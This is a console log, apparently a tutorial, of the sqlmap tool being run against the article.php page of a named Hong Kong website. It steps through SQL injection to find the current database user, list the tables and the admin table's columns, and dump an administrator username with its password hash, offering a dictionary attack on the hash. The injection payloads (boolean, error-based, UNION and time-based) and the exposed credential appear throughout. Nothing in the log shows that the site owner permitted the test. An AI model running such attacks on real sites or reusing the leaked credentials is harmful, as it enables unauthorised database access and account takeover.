D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>